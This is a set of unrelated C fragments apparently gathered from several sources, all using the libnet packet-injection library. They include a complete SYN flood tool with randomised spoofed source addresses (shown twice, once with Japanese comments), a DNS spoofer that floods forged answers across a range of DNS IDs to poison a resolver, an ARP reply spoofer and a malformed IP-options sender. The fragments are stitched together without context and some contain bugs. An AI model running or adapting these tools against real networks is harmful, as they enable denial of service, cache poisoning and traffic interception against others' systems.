int main(int argc,char *argv[]) { char a; int sock,r; u_long src; u_long dst; char pktbuf[IP_MAXPACKET]; char payload[]="ABCDEFGHIJKLMNOPRST"; u_char options[4]; struct ipoption ipopt; bzero(options,OPT_LEN); while((a=getopt(argc,argv,"d:s:h?"))!=EOF) { switch(a) { case 'h' : { usage(); exit(1); } case 's' : { src=libnet_name_resolve(optarg,0); break;} case 'd' : { dst=libnet_name_resolve(optarg,0); break;} } } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock<0) { perror("socket"); exit(1); } libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf); memcpy(ipopt.ipopt_list, options, OPT_LEN); *(ipopt.ipopt_list) = 0xe4; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf); if (r <0) { libnet_close_raw_sock(sock); printf("Error ip options insertion failed\n"); exit(1); } r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload)); if (r<0) { libnet_close_raw_sock(sock); printf("Error write_ip \n"); exit(1); } libnet_close_raw_sock(sock); return 0; }
void abort (void) { printf (":: exiting...\n\n"); libnet_close_raw_sock (s); libnet_destroy_packet (&packet); exit (EXIT_SUCCESS); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // allocate memory for packet if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length packet); // packet header memory libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // urgent pointer NULL, // payload (none) 0, // payload length packet + LIBNET_IP_H); // packet header memory if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // inject packet if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy_packet(&packet); // free packet memory if (libnet_close_raw_sock(network) == -1) // close the network interface libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd, FileData *ipod, char *device) { int n; u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0; static u_int8_t *pkt; static int sockfd = -1; struct libnet_link_int *l2 = NULL; u_int8_t link_offset = 0; #if !defined(WIN32) int sockbuff = IP_MAXPACKET; #endif if (pd->file_mem == NULL) pd->file_s = 0; if (ipod->file_mem == NULL) ipod->file_s = 0; if (got_link) /* data link layer transport */ { if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL) { nemesis_device_failure(INJECTION_LINK, (const char *)device); return -1; } link_offset = LIBNET_ETH_H; } else { if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { nemesis_device_failure(INJECTION_RAW, (const char *)NULL); return -1; } #if !defined(WIN32) if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff, sizeof(sockbuff))) < 0) { fprintf(stderr, "ERROR: setsockopt() failed.\n"); return -1; } #endif } udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s + ipod->file_s; udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H); #ifdef DEBUG printf("DEBUG: UDP packet length %u.\n", udp_packetlen); printf("DEBUG: IP options size %u.\n", ipod->file_s); printf("DEBUG: UDP payload size %u.\n", pd->file_s); #endif if (libnet_init_packet(udp_packetlen, &pkt) == -1) { fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); return -1; } if (got_link) libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off, ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr, NULL, 0, pkt + link_offset); libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem, pd->file_s, pkt + link_offset + LIBNET_IP_H); if (got_ipoptions) { if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem, ipod->file_s, pkt + link_offset)) == -1) { fprintf(stderr, "ERROR: Unable to add IP options, discarding " "them.\n"); } } if (got_link) libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H + ipod->file_s); libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H + pd->file_s + ipod->file_s); if (got_link) n = libnet_write_link_layer(l2, device, pkt, udp_packetlen); else n = libnet_write_ip(sockfd, pkt, udp_packetlen); if (verbose == 2) nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE); if (verbose == 3) nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE); if (n != udp_packetlen) { fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote " "%d bytes.\n", n); } else { if (verbose) { if (got_link) printf("Wrote %d byte UDP packet through linktype %s.\n", n, nemesis_lookup_linktype(l2->linktype)); else printf("Wrote %d byte UDP packet.\n", n); } } libnet_destroy_packet(&pkt); if (got_link) libnet_close_link_interface(l2); else libnet_close_raw_sock(sockfd); return n; }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 6) { printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"; payload_size = 21; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 0, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ 33, /* payload length */ packet + LIBNET_IP_H); /* * dns header construction */ libnet_build_dns(id, /* dns id */ 0x0100, /* control flags */ 1, /* number of questions */ 0, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); /* * we're done with this packet */ libnet_destroy_packet(&packet); /* * we're done writing */ if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int i, /* loop counter */ written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ npackets, /* num of packet to write */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 7) { printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); npackets = (int) atoi(argv[6]); payload = /* question section name/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, names/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, ttl, size: 4 */ "\xff\xff\xff\xff" /* answer section, rdata length, size: 2 */ "\x00\x04" /* answer section, rdata, size: 4 */ "\x81\x51\xe0\x43"; payload_size = 52; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 10951, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ payload_size + 12, /* payload length */ packet + LIBNET_IP_H); /* * write npackets * we loop from here because we must change the dns id and also re-checksum */ printf("\nwriting packets"); for (i = 0; i < npackets; i++) { printf("."); /* * dns header construction */ libnet_build_dns(id+i, /* dns id */ 0x8180, /* control flags */ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); } /* * cleanup */ libnet_destroy_packet(&packet); if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); printf("\n"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
/* * injection_write_ip * * Description: * - Write an IP packet into the wire. It can use either raw sockets * or the wire * * Inputs: * - ip_packet: the IP packet * * Outputs: * - return: 0 if ok, <0 if there were problems * */ int injection_write_ip (u_char *ip_packet) { #if defined(INJECT_USING_RAW_SOCKETS) || defined(INJECT_USING_LINK_LAYER) int i; u_int16_t packet_size = ntohs(*(u_int16_t*)(ip_packet+2)); #endif #if defined(INJECT_USING_RAW_SOCKETS) int network; /* network initialization */ if ((network = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { return WIRE_ERR_PKTD_INJECTION_OPEN; /* packet injection */ } else if ((i = libnet_write_ip (network, ip_packet, packet_size)) < packet_size) { return WIRE_ERR_PKTD_INJECTION_WRITE_IP; /* shut down the interface */ } else if (libnet_close_raw_sock (network) < 0) { return WIRE_ERR_PKTD_INJECTION_CLOSE; } return WIRE_ERR_NONE; #elif defined(INJECT_USING_LINK_LAYER) char buffer[LIBNET_ETH_H+IP_MAXPACKET]; struct in_addr in; int size = 1024; struct libnet_link_int *network; /* pointer to link interface struct */ char *interface = NULL; /* pointer to the device to use */ struct sockaddr_in sin; char errbuf[1024]; struct ether_addr remote_eth, *tmp_eth; /* network initialization */ if (libnet_select_device(&sin, &interface, errbuf) == -1) { return WIRE_ERR_PKTD_NO_WRITE_DEVICE_ACCESS; } if ((network = libnet_open_link_interface(interface, errbuf)) == NULL) { return WIRE_ERR_PKTD_INJECTION_OPEN; } /* get local ethernet address */ if ((tmp_eth = libnet_get_hwaddr(network, interface, errbuf)) == NULL) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_OPEN; } memcpy (&local_eth, tmp_eth, 6); debug3 ("injection_write_ip: the local ethernet address is %s\n", ether_ntoa(&local_eth)); /* get remote ethernet address (the packet is already in network order) */ in.s_addr = *(u_int32_t*)(ip_packet+16); /* try to get the remote MAC address from the ARP cache */ if (get_mac_address (in, buffer, size) < 0) { /* MAC address of the IP address not in ARP cache */ /* get the gateway needed to reach the destination */ struct in_addr gw; if (get_gateway (in, &gw) < 0) { debug3 ("injection_write_ip: can't find MAC nor gateway for %s\n", inet_ntoa(in)); (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } /* get the gateway's ethernet address */ if (get_mac_address (gw, buffer, size) < 0) { debug3 ("injection_write_ip: can't find MAC for %s's ", inet_ntoa(in)); debug3 ("gateway (%s)\n", inet_ntoa(gw)); /* XXX: This case means typically the destination host is in * the same network than the source, but the destination MAC * address is not in the local ARP cache. Getting a local * MAC address requires implementing ARP, which we won't do * at this moment */ (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } debug3 ("injection_write_ip: IP address %s can be reached ", inet_ntoa(in)); debug3 ("through gateway %s (%s)\n", inet_ntoa(gw), buffer); } else { debug3 ("injection_write_ip: IP address %s corresponds to %s\n", inet_ntoa(in), buffer); } if ((tmp_eth = ether_aton (buffer)) == NULL) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } memcpy (&remote_eth, tmp_eth, 6); /* build ethernet header and use IP packet as payload */ #if (defined(bsdi) || defined(__NetBSD__) || defined(__OpenBSD__) ||\ defined(__FreeBSD__)) libnet_build_ethernet(&(remote_eth.octet[0]), &(local_eth.octet[0]), ETHERTYPE_IP, NULL, 0, buffer); #else libnet_build_ethernet(&(remote_eth.ether_addr_octet[0]), &(local_eth.ether_addr_octet[0]), ETHERTYPE_IP, NULL, 0, buffer); #endif memcpy (buffer+LIBNET_ETH_H, ip_packet, packet_size); packet_size += LIBNET_ETH_H; /* inject the packet */ if ((i = libnet_write_link_layer (network, interface, buffer, packet_size)) < packet_size) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } /* shut down the interface */ (void)libnet_close_link_interface(network); return WIRE_ERR_NONE; #else /* INJECT_USING_LINK_LAYER */ return(0); #endif /* INJECT_USING_LINK_LAYER */ }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト dest_port = (u_short) atoi(argv[2]); // ポート番号 network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // 乱数生成器に種を与える printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // 永久ループ(CTRL-Cで終了されるまで) { libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化) 0, // 断片化 libnet_get_prand(LIBNET_PR8), // TTL (乱数化) IPPROTO_TCP, // トランスポートプロトコル libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化) dest_ip, // 宛先IP NULL, // ペイロード(なし) 0, // ペイロード長 packet); // パケットヘッダメモリ libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化) dest_port, // 宛先TCPポート libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化) libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化) TH_SYN, // コントロールフラグ (SYNフラグのみ設定) libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化) 0, // 至急ポインタ NULL, // ペイロード (なし) 0, // ペイロード長 packet + LIBNET_IP_H); // パケットヘッダメモリ if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する } libnet_destroy_packet(&packet); // パケットメモリを解放する if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main(int argc, char *argv[]) { // packet type (arp/udp/tcp) char type[5]; // network device char *device = "eth0\0"; struct libnet_link_int *link; // Raw socket int sock; // error buffer char errbuff[LIBNET_ERRBUF_SIZE]; // src and dst mac u_char dmac[6],smac[6]; // src and dst ip unsigned int src_ip, dst_ip; // packet buffer unsigned char *packet; // packet payload char *payload; // payload size int p_size; // bytes send over the wire int send; // check parameter if(argc == 1) { printf("Usage: %s <arp/udp/tcp>\n",argv[0]); exit(0); } else { strcpy(type,argv[1]); } // Allocate memory for the payload payload = malloc(50); // Packets payload strcpy(payload,"TEST LIBNET\0"); packet = NULL; // payload size p_size = strlen(payload); // mac address strcpy(smac,SMAC); strcpy(dmac,DMAC); // ip address in network byte order src_ip = inet_addr(SOURCE); dst_ip = inet_addr(DEST); // Lookup ip addresses src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0); dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0); // Build an ARP packet? if(!strcmp(type,"arp")) { // open the network device link = libnet_open_link_interface(device,errbuff); // Failed? if(link == NULL) { printf("Error while opening device %s!\n%s\n",device,errbuff); exit(1); } printf("Using device %s\n",device); // Allocate memory for the packet if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } if(packet == NULL) { printf("libnet_init_packet error!\n"); exit(1); } // Build ethernet header libnet_build_ethernet(dmac, // destination mac smac, // source mac ETHERTYPE_ARP,// ethernet packet type NULL, // pointer to payload 0, // payload size packet // pointer to packet buffer ); printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST); libnet_build_arp(ARPHRD_ETHER, // hardware type ETHERTYPE_IP, // protocol type ETHER_ADDR_LEN, // hardware address size 4, // protocol address size ARPOP_REPLY, // ARP operation smac, // source mac (u_char *)&src_ip, // source ip dmac, // destination mac (u_char *)&dst_ip, // destination ip NULL, // pointer to payload 0, // payload size packet+LIBNET_ETH_H // pointer to packet buffer ); // Get the packet on the wire send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the network device libnet_close_link_interface(link); } else { // Open a raw sock sock = libnet_open_raw_sock(IPPROTO_RAW); // Allocate memory for the packet if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } // Build ip header libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length 0, // ip type of service 242, // ip id 0, // fragmentation bit 48, // time to live IPPROTO_TCP, // Transport Control Protokoll src_ip, // source ip dst_ip, // destination ip NULL, // pointer to ip payload 0, // ip options packet // pointer to packet buffer ); // Build UDP packet? if(!strcmp(type,"udp")) { libnet_build_udp(ntohs(SPORT), // Source port ntohs(DPORT), // destination port payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to packet buffer ); printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Build TCP/IP packet per default else { // Build tcp header libnet_build_tcp(ntohs(SPORT), // source port ntohs(DPORT), // destination port 1000000000, // acknowledge number 1000000000, // sequence number TH_ACK, // tcp flags 1024, // window size 0, // urgent pointer payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to the packet buffer ); printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Calculize checksum libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size); // Get the packet on the wire send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the socket libnet_close_raw_sock(sock); } // free the memory //libnet_destroy_packet(packet); free(payload); free(errbuff); return 1; }